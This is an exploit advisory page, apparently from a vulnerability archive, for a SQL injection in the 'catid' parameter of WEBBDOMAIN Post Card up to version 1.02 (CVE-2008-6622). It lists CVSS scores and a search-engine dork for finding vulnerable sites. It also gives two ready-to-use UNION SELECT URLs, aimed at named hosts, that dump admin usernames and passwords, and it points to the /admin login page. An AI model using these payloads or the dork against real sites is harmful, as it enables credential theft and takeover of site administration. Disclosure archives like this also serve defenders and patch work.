WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability

2009.04.09

Credit: Hussin X

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6622

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
DorK : inurl:choosecard.php?catid=
_____
ExploiT & Demo
_______
post Card v 1.01
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
post Card v 1.02
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
Note : Exploit in Properties Picture
Login :
______
/admin
Greetz : All my freind
Im IraQi | Im TrYaGi

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.